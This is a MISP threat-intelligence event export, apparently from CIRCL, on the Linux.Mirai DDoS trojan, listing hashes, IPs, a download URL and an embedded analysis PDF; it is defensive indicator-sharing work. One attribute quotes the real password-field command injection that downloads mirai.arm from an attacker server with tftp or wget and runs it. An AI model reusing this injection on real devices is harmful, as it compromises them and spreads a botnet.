2023-04-21 13:25:09 +00:00
{
"Event" : {
"analysis" : "2" ,
"date" : "2016-10-01" ,
"extends_uuid" : "" ,
"info" : "OSINT - Investigation of Linux.Mirai Trojan family" ,
"publish_timestamp" : "1475309596" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1475309569" ,
"uuid" : "57ef6d48-20c8-4e55-9f02-468f950d210f" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#3b7500" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "circl:incident-classification=\"malware\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#004646" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#32003e" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "ms-caro-malware:malware-type=\"DDoS\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#670080" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "ms-caro-malware:malware-platform=\"Linux\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mirai\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
] ,
"Attribute" : [
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475308942" ,
"to_ids" : false ,
"type" : "comment" ,
"uuid" : "57ef6d8e-6630-40f3-976b-4234950d210f" ,
"value" : "A Trojan for Linux that was named Linux.Mirai has several predecessors. The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87. At the beginning of August, a new version of this Trojan Linux.DDoS.89 was discovered. Finally, Doctor Web\u00e2\u20ac\u2122s security researchers investigated the \r\nLinux.Mirai Trojan found later that month."
} ,
{
"category" : "External analysis" ,
"comment" : "Dr.WEB - Investigation of Linux.Mirai Trojan family" ,
"data" : " J V B E R i 0 x L j Q N C i X i 48 / T D Q o l D Q o l d 1 B E R j Q g Y n k g V 1 B D d W J l Z C B H b W J I L C A g M z J i a X Q g I H V u a W N v Z G U g D Q o l D Q o l D Q o x I D A g b 2 J q D Q o 8 P A 0 K L 0 Z p b H R l c i 9 T d G F u Z G F y Z A o v U i A y I C 9 W I D E K L 0 88 Z j M 0 N W E x Y 2 R i M D g 0 O D A x Z D k 5 N G Q 3 O G Y 2 O W U 4 Y j I y N j I w N D U y Z j l i Z m I 0 M T A 3 Z D J m Z T J k N G J i O T J j Z m V l N j J j O D 4 K L 1 U 8 M T I 4 N W E y M j c 5 M 2E3 O T U 5 Y j c 1 Y 2E0 N D U 5 Z j h h N T h i Y j c 4 Z T B l N D N i M T h h N T Z h Z T U 1 Z D U 3 N j g 5 Y 2E3 M G I 1 M j c 4 M z 4 K L 1 A g L T M 4 O D Q N C j 4 + D Q p l b m R v Y m o N C j I g M C B v Y m o N C j w 8 L 1 R 5 c G U v T W V 0 Y W R h d G E v U 3 V i d H l w Z S 9 Y T U w v T G V u Z 3 R o I D E 4 N j E g P j 4 N C n N 0 c m V h b Q r b B g p t o m u n S v L W F L i 7 + v O U F L + q q u T y d r q g B 7 T 312 e k 3 J w M p E S X 63 P 9 P W P 2 y h Z y 5 w F N a p F g q C W I 4 i G q L R c k V z T j + n I 8 Y k o f u J I o z h b y Q a W Z o + 4 h X Y J N M x O n E q C j H X 1 x y w b 6 s E E a g y 0e8 d 3 S S r S g 1 q s Y 3 t r b V O 89E5 + J E r w e l x L z U 5 l W T W r S 3 J K O b H A g O T D W J z I F a q Y o X P e u t + H K y 5 Q C P W y 5 C N b h 7 + E o T b a L / d X n U i j b Y 3 z / d S Q J V D 1 U E X 1 X C E K d J e K J Y U B K b e U N 3 f U U g V N G o t D f Z c I V u t s 8 Z 1 W G q A h i H 81 z 20 f S 4 f S / a K O W l z H 2 Y s k v 1 L k k I I s O g e c P a / b 7 Z r K U a H f 0 b 7 u i 494 n X f h 3 e r q T M z V i C L W M u 8 U b I s F 7 C 9 Q D M C H s w 8 O P t j J y + Q 71 r A v Q 9 U p 5 v r K 7 H / P L E v r w i E F s k 9 v X b r f L S 4 d X v 4 u z g M Y / W b e n g D Q J L H 48 a L X Z j z n 9 a l W R Y A d Y Y C x Z A K W B m Q P Q N D O Z n G Q W p P 8 t d i v D d b f 2 l 9 z v 43 C Y 8 H W C 9 r 8 t o 1 S W X M u o Y 9 / + p j m 7 p 4 P Q d p h 9 Z v J X / Q M y y V a X 1 Y G q l d F Z 5 y I K N l v Y I d / W i w L L N S v U A D R X T I j G N L S O 7 w i o r U f / g E + g V 1 G G y i K 0 V I 64 Y P j 2 J H P f j h J b L g k h V K s 0 j n 0 c E p 5 / 2 h c v h J v X w x 6 + 2 R q m 6 u L 1 b g + g h V V x x H T r 6 D 2 S T L 0 C H 0 w / c y 3 W + Y + l z S P E q 2 a V 9 E E / p v n 9 y G r o d U N x y z g t Z L N q W 5 / q k y L T A B 2 G Y 7 h a 5 N q v h 0 D b I 2 d s 2 d S 7 i t f 5 Z 9 S H S F q l Q H H A T S t r U i 0 c d W Q s z A C w 9 x X S Q J J c x m u n K U f 5 y R / x R u P b 53 Z c j u c Z b R j B Z c 8 K T H + R p 8 n H l i w 0 F 5 u l E D N o P Q Y t X T v k N h n S M + d A 7 + a y t J 37 V w Z 1 S 8 N j H b 75 Z D f U V r X a / 0 5 f 8 g A n B G D p h R S Y 0 d n b E D L b E W i G 2 v 14 d M r H q w V i Z o 3 I i u g A M J W s + 0 + W Q m 9 t M w 4 F z J r s w / M L 7 k M K H 9 Q + s 2 D 8 N j 48 e v I D t k G j F 8 + I F 7 U R z J t l n D a O l c y Q X v 4 W u G q N M S B 2 T v y 1 N 1 H V L u Q N m G i F I J q 4 b f 2 c V V X 4 T b 0 k A V s 4 q n i u N P R a p J H m l T G O q L Z E 6 j Q Q V x n f 9 Q p j S Y V H l l q h W 3 w 3 S v 52 F j D p l 5 v v 3 m I x v 1 + u N T F F 9 u I J X V A z 0 O c P l C H A h t V c c C d s i D / L E k 93 j y X c F U R s n E n Z A M 8 O n 8 u k a E w i 2 v P B K h E / K 39 K q 8 c 0 m 7 p L w w a X 7 P w 9 S V O L u B F 6 W u W N 9 f L Z 7 L 8 n F v E U C E / V o V I Y H 68 B N R + B 6 P 4 V P H g R 8 o t x 8 c c v o u o z b H 9 M N t f F k K l R h E k M w v Z L z w I m k T w l R D S q E q 1 E o J z J / z g r x K 2 G Y Y 5 k E 14 L 46 F X u i x B w Y N 6 f 0 A N r y X D B 1 B b z A j I + g e 7 l c q o w M h Y Y a F / d f F C / l U V z t C d t d A V s K a G P T R M t N h + j s N a V G h s m X Q 76 L T k X i I + y 97 F y q c o + s Z j 3 m U Q 949 l D n s C f o e B Z b i e U p o e 3 A r q s R a o q 5 I 9 G j N V 5 U J u q L B H j u m I h F o M + n O 9 o G o M I Z g K Z u Y 2 z Z c r A 1 F x + i H P 1 m h 0 G D l 1 + 38 h E T x 2 w 4 u 0 6 G I R y 5 I 3 w g 9 K B u H a W R V 4 Y Y q 6 v g c z f a x p z j n O T r b r H y M b H 5 i g W H g o k p 0 5 k T q N X E U L v l C h Q e t + i t H D d z i V q o O P e P 7 K 6 n Y s u q f S Y F F e w q r g D D L K K k 55 C v x U x Z J X B 0 g R D n A F t K e J T V D I e e v g x l o C 8 d X D X h R 5 c z x b l v O w l g 9 y b z G / 4 n j V V T j t H b f T d 6 L 74 I G W B r h l N R f L E t L y R 7 R / e R 0 a g f 8 d e M H H t O u v / 5 A t V 8 r k n m S F g f c b J E D q d L B N x l k k I 6 H 2 w l I z s D K s x w 1 f 6 m B Z G t f K 1 A X T t e 9 n f A 2 Y 2 i + 3 g H L u + 7 Y w P b S C a C I a j o O g 0 A b j v U Q i s a 2 z F 3 r o q + + w 66 C I N x 9 X j Q K U p k P M F 3 v X U D p w j l Q P x f X k D 9 W i 9 P H x I w u Q + j C C L k b G Q C x K 5 X g a p 9 + J 5 G c t u I x x g M u R K a A W 1 n S 8 R l r h a e I f x M I M l 7 V a m h L 5 a 0 v 8 F 9 x m p t 9 U D d 1 y o K 4 o l l d n 5 q f I i 9 S S Q f t c m G a 65 + r i D Y f i k 0 D 7 i i u Y s g 5 R g q v f G 43 V 6 G Z V a 2 F k p e U I g 6 + N q Y h r 3 N D d v X 84 P 6 y i 4 M + r t o g u P + C m e g A I f J 0 I w 6 n c N s v F / U I k i x N w R a n W K w V 386 K N g f Z 1 N T 2 Q l C 446 p 6 / L j + E 5 K b t B q D T 1 N 8 K / v / 6 M A b 48 I h t 2 n 3 Q x q 1 K 0 1 j e j N j h K T w J 1 r P u M l A C 43 V 93 C z r / 8 I q T t j E Y y 7 Y c G S g M x O e Q Q O U f 9 t Y q H n m 1 v P 0 Y G A W G r J i 61 l y k / S 2 E b B I z N I w b k M D f z Y H S A B n p i h J / p + D w H t r H r 0 8 y n e c X y K y a Z Q n D i C e s / C Y S 9 V S 7 X 1 d n Q t L + o 6 l C C N e j a + W + + o m X 6 B d y F K o p O D y O u j W P M I P 3 e I i n n 3 g x 7 m 0 7 b J B S x 1 X 8 / A T c k l 6 T m u B B W X 9 y 3 Y b G n F u g B m y j //BmKYIAiLGCS2PEyeLMmNOBaZqy73PR99TslSpYWA9yz9K/NsED13vkLJ+khan03hBgleuvPZClJ7rbsXNCmVuZHN0cmVhbQ0KZW5kb2JqDQozIDAgb2JqDQo8PA0KL0NyZWF0b3IoXDIwNFwyNzNwXDMzMFwzMjNcMDI1XDM2NH1cMzYxXDMwMSFNXDAzNSkKL0F1dGhvcihcMjEwXDI2MX9cMzM0XDIyNypcMjY1RFwzNDFcMzAyKQovVGl0bGUoXDIwNVwyNjBqXDMxNVwyMTMsXDM3NHRcMzQ1XDMyNCRcMDAyRFwzNTFYXlVIJXtcMjEyXDM0NFwyMTQ8XDM1NlwzMjQ1XDMyNDpcMzc0OFx0LlwyMTBcMDI0LHB6XDI1MUJcMjIwZSkKL1N1YmplY3QoXDM2MFwzNzNMXDM3MlwyNjdcMDM0XDMwMFBcMzIwXDM1NlwwMTQgb1wzNTRcdCkKL0tleXdvcmRzKFwzNjBcMzczTFwzNzJcMjY3XDAzNFwzMDBQXDMyMFwzNjZcYj95XDIwMHh2UDopCi9DcmVhdGlvbkRhdGUoXDIxMFwzNDQuXDIzMFwzMTFuXDI0NSpcMjY3XDIyMHxeXDAzN1wzNzFcMDA1XHQvKQovTW9kRGF0ZShcMjEwXDM0NC5cMjMwXDMxMW5cMjQ1KlwyNjdcMjIwfF5cMDM3XDM3MVwwMDVcdC8pCi9Qcm9kdWNlcihcMjczXDIxNlhcMzU2XDMxNHhcMzY3alwyNDRcMzY3XDAzNS5fXDI1M1JcXFVDIXdcMjY3KQ0KPj4NCmVuZG9iag0KNCAwIG9iag0KPDwKL1R5cGUvWE9iamVjdAovU3VidHlwZS9JbWFnZQovTmFtZS93cHQxCi9XaWR0aCA1OTUKL0hlaWdodCA4NDIKL0JpdHNQZXJDb21wb25lbnQgOAovQ29sb3JTcGFjZS9EZXZpY2VSR0IKL0xlbmd0aCA3NzgzMQovRmlsdGVyIFsvRmxhdGVEZWNvZGVdID4+DQpzdHJlYW0KnS5EvmxVqORDsfB7ka05m/9/EeVp+hBoWrZ3qLsLXr5YHT8D2CRdJBVpUQni5xHszMERi5hN0bbUTOMsAD+H5SMxV8lB+hwENvo/aYgRDFzOSFkTZJGH9ruCnKBpUoIhsDP2n1dlzWuo/kex5PBq9ZWHdN570KETZqzcvA7+RAPpUMnw9NgI78+VfNK8hncTK0LG3wm25Z
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475308992" ,
"to_ids" : false ,
"type" : "attachment" ,
"uuid" : "57ef6dc0-16dc-4e4e-980b-4ebb950d210f" ,
"value" : "Investigation_of_Linux.Mirai_Trojan_family_en.pdf"
} ,
{
"category" : "Payload delivery" ,
"comment" : "x86" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309027" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "57ef6de3-827c-4967-9708-42ce950d210f" ,
"value" : "c129e2a23abe826f808725a0724f12470502a3cc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309027" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "57ef6de3-f1b0-4776-9e5a-4add950d210f" ,
"value" : "8fd0d16edf270c453c5b6b2481d0a044a410c7cd"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309027" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "57ef6de3-b284-456d-b74a-4b63950d210f" ,
"value" : "9ff383309ad63da2caa9580d7d85abeece9b13a0"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309209" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "57ef6e99-0a20-4839-a902-4e4d950d210f" ,
"value" : ".shinigami"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309292" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "57ef6eec-c238-49ec-a6f8-4521950d210f" ,
"value" : "http://5.206.225.122/bins/mirai.arm"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309307" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "57ef6efb-b9fc-498a-a704-4f7f950d210f" ,
"value" : "5.206.225.122"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309335" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "57ef6f17-16f4-4e11-b0ce-4e91950d210f" ,
"value" : "151.80.99.84"
} ,
{
"category" : "Payload delivery" ,
"comment" : "The malware was installed on a dvr and was started with this bash injection in password field" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309367" ,
"to_ids" : true ,
"type" : "comment" ,
"uuid" : "57ef6f37-5074-4e2b-85e6-4599950d210f" ,
"value" : "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309391" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef6f4f-8220-43c7-912c-4818950d210f" ,
"value" : "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "57ef7002-6900-46c9-ac17-465d02de0b81" ,
"value" : "f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "57ef7002-0194-4671-b962-44fa02de0b81" ,
"value" : "78440b86e34579001bea6ebc600751f5"
} ,
{
"category" : "External analysis" ,
"comment" : "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef7002-0738-471a-8108-4e7502de0b81" ,
"value" : "https://www.virustotal.com/file/f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc/analysis/1465114448/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "57ef7002-2174-4783-bf9b-4e0a02de0b81" ,
"value" : "7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "57ef7003-6fac-4d16-86e4-411502de0b81" ,
"value" : "e64079b3ccf906204474beca1f5cc41d"
} ,
{
"category" : "External analysis" ,
"comment" : "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef7003-9390-423a-a424-4b2a02de0b81" ,
"value" : "https://www.virustotal.com/file/7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc/analysis/1464739147/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "57ef7003-e8e4-4eee-b196-4b8e02de0b81" ,
"value" : "45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56"
} ,
{
"category" : "Payload delivery" ,
"comment" : "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "57ef7003-2388-4060-a02f-48c602de0b81" ,
"value" : "5d25f735cf059d6b4076947860da5c45"
} ,
{
"category" : "External analysis" ,
"comment" : "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef7003-07c0-4d57-a1d9-4a2d02de0b81" ,
"value" : "https://www.virustotal.com/file/45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56/analysis/1465114403/"
}
]
}
}